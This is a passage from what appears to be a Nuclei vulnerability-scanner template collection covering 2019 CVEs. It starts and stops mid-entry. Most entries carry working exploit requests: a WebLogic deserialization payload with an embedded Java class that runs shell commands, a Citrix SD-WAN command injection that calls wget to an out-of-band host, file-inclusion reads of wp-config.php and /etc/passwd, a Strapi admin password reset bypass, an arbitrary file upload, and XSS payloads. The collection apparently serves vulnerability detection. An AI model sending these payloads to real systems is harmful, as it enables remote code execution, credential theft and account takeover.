index=\"4606\"><byte>0</byte></void><void index=\"4607\"><byte>9</byte></void><void index=\"4608\"><byte>112</byte></void><void index=\"4609\"><byte>116</byte></void><void index=\"4610\"><byte>0</byte></void><void index=\"4611\"><byte>4</byte></void><void index=\"4612\"><byte>80</byte></void><void index=\"4613\"><byte>119</byte></void><void index=\"4614\"><byte>110</byte></void><void index=\"4615\"><byte>114</byte></void><void index=\"4616\"><byte>112</byte></void><void index=\"4617\"><byte>119</byte></void><void index=\"4618\"><byte>1</byte></void><void index=\"4619\"><byte>0</byte></void><void index=\"4620\"><byte>120</byte></void><void index=\"4621\"><byte>115</byte></void><void index=\"4622\"><byte>125</byte></void><void index=\"4623\"><byte>0</byte></void><void index=\"4624\"><byte>0</byte></void><void index=\"4625\"><byte>0</byte></void><void index=\"4626\"><byte>1</byte></void><void index=\"4627\"><byte>0</byte></void><void index=\"4628\"><byte>29</byte></void><void index=\"4629\"><byte>106</byte></void><void index=\"4630\"><byte>97</byte></void><void index=\"4631\"><byte>118</byte></void><void index=\"4632\"><byte>97</byte></void><void index=\"4633\"><byte>120</byte></void><void index=\"4634\"><byte>46</byte></void><void index=\"4635\"><byte>120</byte></void><void index=\"4636\"><byte>109</byte></void><void index=\"4637\"><byte>108</byte></void><void index=\"4638\"><byte>46</byte></void><void index=\"4639\"><byte>116</byte></void><void index=\"4640\"><byte>114</byte></void><void index=\"4641\"><byte>97</byte></void><void index=\"4642\"><byte>110</byte></void><void index=\"4643\"><byte>115</byte></void><void index=\"4644\"><byte>102</byte></void><void index=\"4645\"><byte>111</byte></void><void index=\"4646\"><byte>114</byte></void><void index=\"4647\"><byte>109</byte></void><void index=\"4648\"><byte>46</byte></void><void index=\"4649\"><byte>84</byte></void><void index=\"4650\"><byte>101</byte></void><void index=\"4651\"><byte>109</byte></void><void index=\"4652\"><byte>112</byte></void><void index=\"4653\"><byte>108</byte></void><void index=\"4654\"><byte>97</byte></void><void index=\"4655\"><byte>116</byte></void><void index=\"4656\"><byte>101</byte></void><void index=\"4657\"><byte>115</byte></void><void index=\"4658\"><byte>120</byte></void><void index=\"4659\"><byte>114</byte></void><void index=\"4660\"><byte>0</byte></void><void index=\"4661\"><byte>23</byte></void><void index=\"4662\"><byte>106</byte></void><void index=\"4663\"><byte>97</byte></void><void index=\"4664\"><byte>118</byte></void><void index=\"4665\"><byte>97</byte></void><void index=\"4666\"><byte>46</byte></void><void index=\"4667\"><byte>108</byte></void><void index=\"4668\"><byte>97</byte></void><void index=\"4669\"><byte>110</byte></void><void index=\"4670\"><byte>103</byte></void><void index=\"4671\"><byte>46</byte></void><void index=\"4672\"><byte>114</byte></void><void index=\"4673\"><byte>101</byte></void><void index=\"4674\"><byte>102</byte></void><void index=\"4675\"><byte>108</byte></void><void index=\"4676\"><byte>101</byte></void><void index=\"4677\"><byte>99</byte></void><void index=\"4678\"><byte>116</byte></void><void index=\"4679\"><byte>46</byte></void><void index=\"4680\"><byte>80</byte></void><void index=\"4681\"><byte>114</byte></void><void index=\"4682\"><byte>111</byte></void><void index=\"4683\"><byte>120</byte></void><void index=\"4684\"><byte>121</byte></void><void index=\"4685\"><byte>-31</byte></void><void index=\"4686\"><byte>39</byte></void><void index=\"4687\"><byte>-38</byte></void><void index=\"4688\"><byte>32</byte></void><void index=\"4689\"><byte>-52</byte></void><void index=\"4690\"><byte>16</byte></void><void index=\"4691\"><byte>67</byte></void><void index=\"4692\"><byte>-53</byte></void><void index=\"4693\"><byte>2</byte></void><void index=\"4694\"><byte>0</byte></void><void index=\"4695\"><byte>1</byte></void><void index=\"4696\"><byte>76</byte></void><void index=\"4697\"><byte>0</byte></void><void index=\"4698\"><byte>1</byte></void><void index=\"4699\"><byte>104</byte></void><void index=\"4700\"><byte>116</byte></void><void index=\"4701\"><byte>0</byte></void><void index=\"4702\"><byte>37</byte></void><void index=\"4703\"><byte>76</byte></void><void index=\"4704\"><byte>106</byte></void><void index=\"4705\"><byte>97</byte></void><void index=\"4706\"><byte>118</byte></void><void index=\"4707\"><byte>97</byte></void><void index=\"4708\"><byte>47</byte></void><void index=\"4709\"><byte>108</byte></void><void index=\"4710\"><byte>97</byte></void><void index=\"4711\"><byte>110</byte></void><void index=\"4712\"><byte>103</byte></void><void index=\"4713\"><byte>47</byte></void><void index=\"4714\"><byte>114</byte></void><void index=\"4715\"><byte>101</byte></void><void index=\"4716\"><byte>102</byte></void><void index=\"4717\"><byte>108</byte></void><void index=\"4718\"><byte>101</byte></void><void index=\"4719\"><byte>99</byte></void><void index=\"4720\"><byte>116</byte></void><void index=\"4721\"><byte>47</byte></void><void index=\"4722\"><byte>73</byte></void><void index=\"4723\"><byte>110</byte></void><void index=\"4724\"><byte>118</byte></void><void index=\"4725\"><byte>111</byte></void><void index=\"4726\"><byte>99</byte></void><void index=\"4727\"><byte>97</byte></void><void index=\"4728\"><byte>116</byte></void><void index=\"4729\"><byte>105</byte></void><void index=\"4730\"><byte>111</byte></void><void index=\"4731\"><byte>110</byte></void><void index=\"4732\"><byte>72</byte></void><void index=\"4733\"><byte>97</byte></void><void index=\"4734\"><byte>110</byte></void><void index=\"4735\"><byte>100</byte></void><void index=\"4736\"><byte>108</byte></void><void index=\"4737\"><byte>101</byte></void><void index=\"4738\"><byte>114</byte></void><void index=\"4739\"><byte>59</byte></void><void index=\"4740\"><byte>120</byte></void><void index=\"4741\"><byte>112</byte></void><void index=\"4742\"><byte>115</byte></void><void index=\"4743\"><byte>114</byte></void><void index=\"4744\"><byte>0</byte></void><void index=\"4745\"><byte>50</byte></void><void index=\"4746\"><byte>115</byte></void><void index=\"4747\"><byte>117</byte></void><void index=\"4748\"><byte>110</byte></void><void index=\"4749\"><byte>46</byte></void><void index=\"4750\"><byte>114</byte></void><void index=\"4751\"><byte>101</byte></void><void index=\"4752\"><byte>102</byte></void><void index=\"4753\"><byte>108</byte></void><void index=\"4754\"><byte>101</byte></void><void index=\"4755\"><byte>99</byte></void><void index=\"4756\"><byte>116</byte></void><void index=\"4757\"><byte>46</byte></void><void index=\"4758\"><byte>97</byte></void><void index=\"4759\"><byte>110</byte></void><void index=\"4760\"><byte>110</byte></void><void index=\"4761\"><byte>111</byte></void><void index=\"4762\"><byte>116</byte></void><void index=\"4763\"><byte>97</byte></void><void index=\"4764\"><byte>116</byte></void><void index=\"4765\"><byte>105</byte></void><void index=\"4766\"><byte>111</byte></void><void index=\"4767\"><byte>110</byte></void><void index=\"4768\"><byte>46</byte></void><void index=\"4769\"><byte>65</byte></void><void index=\"4770\"><byte>110</byte></void><void index=\"4771\"><byte>110</byte></void><void index=\"4772\"><byte>111</byte></void><void index=\"4773\"><byte>116</byte></void><void index=\"4774\"><byte>97</byte></void><void index=\"4775\"><byte>116</byte></void><void index=\"4776\"><byte>105</byte></void><void index=\"4777\"><byte>111</byte></void><void index=\"4778\"><byte>110</byte></void><void index=\"4779\"><byte>73</byte></void><void index=\"4780\"><byte>110</byte></void><void index=\"4781\"><byte>118</byte></void><void index=\"4782\"><byte>111</byte></void><void index=\"4783\"><byte>99</byte></void><void index=\"4784\"><byte>97</byte></void><void index=\"4785\"><byte>116</byte></void><void index=\"4786\"><byte>105</byte></void><void index=\"4787\"><byte>111</byte></void><void index=\"4788\"><byte>110</byte></void><void index=\"4789\"><byte>72</byte></void><void index=\"4790\"><byte>97</byte></void><void index=\"4791\"><byte>110</byte></void><void index=\"4792\"><byte>100</byte></void><void index=\"4793\"><byte>108</byte></void><void index=\"4794\"><byte>101</byte></void><void index=\"4795\"><byte>114</byte></void><void index=\"4796\"><byte>85</byte></void><void index=\"4797\"><byte>-54</byte></void><void index=\"4798\"><byte>-11</byte></void><void index=\"4799\"><byte>15</byte></void><void index=\"4800\"><byte>21</byte></void><void index=\"4801\"><byte>-53</byte></void><void index=\"4802\"><byte>126</byte></void><void index=\"4803\"><byte>-91</byte></void><void index=\"4804\"><byte>2</byte></void><void index=\"4805\"><byte>0</byte></void><void index=\"4806\"><byte>2</byte></void><void index=\"4807\"><byte>76</byte></void><void index=\"4808\"><byte>0</byte></void><void index=\"4809\"><byte>12</byte></void><void index=\"4810\"><byte>109</byte></void><void index=\"4811\"><byte>101</byte></void><void index=\"4812\"><byte>109</byte></void><void index=\"4813\"><byte>98</byte></void><void index=\"4814\"><byte>101</byte></void><void index=\"4815\"><byte>114</byte></void><void index=\"4816\"><byte>86</byte></void><void index=\"4817\"><byte>97</byte></void><void index=\"4818\"><byte>108</byte></void><void index=\"4819\"><byte>117</byte></void><void index=\"4820\"><byte>101</byte></void><void index=\"4821\"><byte>115</byte></void><void index=\"4822\"><byte>116</byte></void><void index=\"4823\"><byte>0</byte></void><void index=\"4824\"><byte>15</byte></void><void index=\"4825\"><byte>76</byte></void><void index=\"4826\"><byte>106</byte></void><void index=\"4827\"><byte>97</byte></void><void index=\"4828\"><byte>118</byte></void><void index=\"4829\"><byte>97</byte></void><void index=\"4830\"><byte>47</byte></void><void index=\"4831\"><byte>117</byte></void><void index=\"4832\"><byte>116</byte></void><void index=\"4833\"><byte>105</byte></void><void index=\"4834\"><byte>108</byte></void><void index=\"4835\"><byte>47</byte></void><void index=\"4836\"><byte>77</byte></void><void index=\"4837\"><byte>97</byte></void><void index=\"4838\"><byte>112</byte></void><void index=\"4839\"><byte>59</byte></void><void index=\"4840\"><byte>76</byte></void><void index=\"4841\"><byte>0</byte></void><void index=\"4842\"><byte>4</byte></void><void index=\"4843\"><byte>116</byte></void><void index=\"4844\"><byte>121</byte></void><void index=\"4845\"><byte>112</byte></void><void index=\"4846\"><byte>101</byte></void><void index=\"4847\"><byte>116</byte></void><void index=\"4848\"><byte>0</byte></void><void index=\"4849\"><byte>17</byte></void><void index=\"4850\"><byte>76</byte></void><void index=\"4851\"><byte>106</byte></void><void index=\"4852\"><byte>97</byte></void><void index=\"4853\"><byte>118</byte></void><void index=\"4854\"><byte>97</byte></void><void index=\"4855\"><byte>47</byte></void><void index=\"4856\"><byte>108</byte></void><void index=\"4857\"><byte>97</byte></void><void index=\"4858\"><byte>110</byte></void><void index=\"4859\"><byte>103</byte></void><void index=\"4860\"><byte>47</byte></void><void index=\"4861\"><byte>67</byte></void><void index=\"4862\"><byte>108</byte></void><void index=\"4863\"><byte>97</byte></void><void index=\"4864\"><byte>115</byte></void><void index=\"4865\"><byte>115</byte></void><void index=\"4866\"><byte>59</byte></void><void index=\"4867\"><byte>120</byte></void><void index=\"4868\"><byte>112</byte></void><void index=\"4869\"><byte>115</byte></void><void index=\"4870\"><byte>114</byte></void><void index=\"4871\"><byte>0</byte></void><void index=\"4872\"><byte>17</byte></void><void index=\"4873\"><byte>106</byte></void><void index=\"4874\"><byte>97</byte></void><void index=\"4875\"><byte>118</byte></void><void index=\"4876\"><byte>97</byte></void><void index=\"4877\"><byte>46</byte></void><void index=\"4878\"><byte>117</byte></void><void index=\"4879\"><byte>116</byte></void><void index=\"4880\"><byte>105</byte></void><void index=\"4881\"><byte>108</byte></void><void index=\"4882\"><byte>46</byte></void><void index=\"4883\"><byte>72</byte></void><void index=\"4884\"><byte>97</byte></void><void index=\"4885\"><byte>115</byte></void><void index=\"4886\"><byte>104</byte></void><void index=\"4887\"><byte>77</byte></void><void index=\"4888\"><byte>97</byte></void><void index=\"4889\"><byte>112</byte></void><void index=\"4890\"><byte>5</byte></void><void index=\"4891\"><byte>7</byte></void><void index=\"4892\"><byte>-38</byte></void><void index=\"4893\"><byte>-63</byte></void><void index=\"4894\"><byte>-61</byte></void><void index=\"4895\"><byte>22</byte></void><void index=\"4896\"><byte>96</byte></void><void index=\"4897\"><byte>-47</byte></void><void index=\"4898\"><byte>3</byte></void><void index=\"4899\"><byte>0</byte></void><void index=\"4900\"><byte>2</byte></void><void index=\"4901\"><byte>70</byte></void><void index=\"4902\"><byte>0</byte></void><void index=\"4903\"><byte>10</byte></void><void index=\"4904\"><byte>108</byte></void><void index=\"4905\"><byte>111</byte></void><void index=\"4906\"><byte>97</byte></void><void index=\"4907\"><byte>100</byte></void><void index=\"4908\"><byte>70</byte></void><void index=\"4909\"><byte>97</byte></void><void index=\"4910\"><byte>99</byte></void><void index=\"4911\"><byte>116</byte></void><void index=\"4912\"><byte>111</byte></void><void index=\"4913\"><byte>114</byte></void><void index=\"4914\"><byte>73</byte></void><void index=\"4915\"><byte>0</byte></void><void index=\"4916\"><byte>9</byte></void><void index=\"4917\"><byte>116</byte></void><void index=\"4918\"><byte>104</byte></void><void index=\"4919\"><byte>114</byte></void><void index=\"4920\"><byte>101</byte></void><void index=\"4921\"><byte>115</byte></void><void index=\"4922\"><byte>104</byte></void><void index=\"4923\"><byte>111</byte></void><void index=\"4924\"><byte>108</byte></void><void index=\"4925\"><byte>100</byte></void><void index=\"4926\"><byte>120</byte></void><void index=\"4927\"><byte>112</byte></void><void index=\"4928\"><byte>63</byte></void><void index=\"4929\"><byte>64</byte></void><void index=\"4930\"><byte>0</byte></void><void index=\"4931\"><byte>0</byte></void><void index=\"4932\"><byte>0</byte></void><void index=\"4933\"><byte>0</byte></void><void index=\"4934\"><byte>0</byte></void><void index=\"4935\"><byte>12</byte></void><void index=\"4936\"><byte>119</byte></void><void index=\"4937\"><byte>8</byte></void><void index=\"4938\"><byte>0</byte></void><void index=\"4939\"><byte>0</byte></void><void index=\"4940\"><byte>0</byte></void><void index=\"4941\"><byte>16</byte></void><void index=\"4942\"><byte>0</byte></void><void index=\"4943\"><byte>0</byte></void><void index=\"4944\"><byte>0</byte></void><void index=\"4945\"><byte>1</byte></void><void index=\"4946\"><byte>116</byte></void><void index=\"4947\"><byte>0</byte></void><void index=\"4948\"><byte>8</byte></void><void index=\"4949\"><byte>102</byte></void><void index=\"4950\"><byte>53</byte></void><void index=\"4951\"><byte>97</byte></void><void index=\"4952\"><byte>53</byte></void><void index=\"4953\"><byte>97</byte></void><void index=\"4954\"><byte>54</byte></void><void index=\"4955\"><byte>48</byte></void><void index=\"4956\"><byte>56</byte></void><void index=\"4957\"><byte>113</byte></void><void index=\"4958\"><byte>0</byte></void><void index=\"4959\"><byte>126</byte></void><void index=\"4960\"><byte>0</byte></void><void index=\"4961\"><byte>9</byte></void><void index=\"4962\"><byte>120</byte></void><void index=\"4963\"><byte>118</byte></void><void index=\"4964\"><byte>114</byte></void><void index=\"4965\"><byte>0</byte></void><void index=\"4966\"><byte>29</byte></void><void index=\"4967\"><byte>106</byte></void><void index=\"4968\"><byte>97</byte></void><void index=\"4969\"><byte>118</byte></void><void index=\"4970\"><byte>97</byte></void><void index=\"4971\"><byte>120</byte></void><void index=\"4972\"><byte>46</byte></void><void index=\"4973\"><byte>120</byte></void><void index=\"4974\"><byte>109</byte></void><void index=\"4975\"><byte>108</byte></void><void index=\"4976\"><byte>46</byte></void><void index=\"4977\"><byte>116</byte></void><void index=\"4978\"><byte>114</byte></void><void index=\"4979\"><byte>97</byte></void><void index=\"4980\"><byte>110</byte></void><void index=\"4981\"><byte>115</byte></void><void index=\"4982\"><byte>102</byte></void><void index=\"4983\"><byte>111</byte></void><void index=\"4984\"><byte>114</byte></void><void index=\"4985\"><byte>109</byte></void><void index=\"4986\"><byte>46</byte></void><void index=\"4987\"><byte>84</byte></void><void index=\"4988\"><byte>101</byte></void><void index=\"4989\"><byte>109</byte></void><void index=\"4990\"><byte>112</byte></void><void index=\"4991\"><byte>108</byte></void><void index=\"4992\"><byte>97</byte></void><void index=\"4993\"><byte>116</byte></void><void index=\"4994\"><byte>101</byte></void><void index=\"4995\"><byte>115</byte></void><void index=\"4996\"><byte>0</byte></void><void index=\"4997\"><byte>0</byte></void><void index=\"4998\"><byte>0</byte></void><void index=\"4999\"><byte>0</byte></void><void index=\"5000\"><byte>0</byte></void><void index=\"5001\"><byte>0</byte></void><void index=\"5002\"><byte>0</byte></void><void index=\"5003\"><byte>0</byte></void><void index=\"5004\"><byte>0</byte></void><void index=\"5005\"><byte>0</byte></void><void index=\"5006\"><byte>0</byte></void><void index=\"5007\"><byte>120</byte></void><void index=\"5008\"><byte>112</byte></void><void index=\"5009\"><byte>120</byte></void></array></void></class></work:WorkContext></soapenv:Header><soapenv:Body></soapenv:Body></soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>id</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12988","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-1821","info":{"name":"Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /servlet/UploadServlet HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nPrimary-IP: 127.0.0.1\nFilename: test.tar\nFilesize: 10240\nCompressed-Archive: false\nDestination-Dir: tftpRoot\nFilecount: 1\nContent-Length: 269\nContent-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83\n\n--871a4a346a547cf05cb83f57b9ebcb83\nContent-Disposition: form-data; name=\"files\"; filename=\"test.tar\"\n\n../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar  00000000000000{{randstr}}\n--871a4a346a547cf05cb83f57b9ebcb83--\n","GET /test.txt HTTP/1.1\nHost: {{Host}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains((body_2), '{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2019-18818","info":{"name":"strapi CMS <3.0.0-beta.17.5 - Admin Password Reset","severity":"critical"},"requests":[{"raw":["POST /admin/auth/reset-password HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"code\": {\"$gt\": 0}, \"password\": \"SuperStrongPassword1\", \"passwordConfirmation\": \"SuperStrongPassword1\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"body","words":["\"username\":","\"email\":","\"jwt\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".user.username",".user.email"]}]}]},{"id":"CVE-2019-16525","info":{"name":"WordPress Checklist <1.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/checklist/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Checklist","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17503","info":{"name":"Kirona Dynamic Resource Scheduler - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osm/REGISTER.cmd","{{BaseURL}}/osm_tiles/REGISTER.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DEBUGMAPSCRIPT=TRUE","@echo off"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9041","info":{"name":"ZZZCMS 1.6.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /search/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nkeys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","!contains(body_1, \"phpinfo\")","contains_all(body_2, \"phpinfo\",\"PHP Version\")"],"condition":"and"}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0232","info":{"name":"Apache Tomcat `CGIServlet` enableCmdLineArguments - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /?&echo+{{sid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{sid}}"]},{"type":"word","negative":true,"part":"body","words":["echo {{sid}}","echo+{{sid}}"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19985","info":{"name":"WordPress Email Subscribers & Newsletters <4.2.3 - Arbitrary File Retrieval","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name","Email","Status","Created On"],"condition":"and"},{"type":"word","part":"header","words":["Content-Disposition: attachment; filename=all-contacts.csv;"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16662","info":{"name":"rConfig 3.9.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8982","info":{"name":"Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request 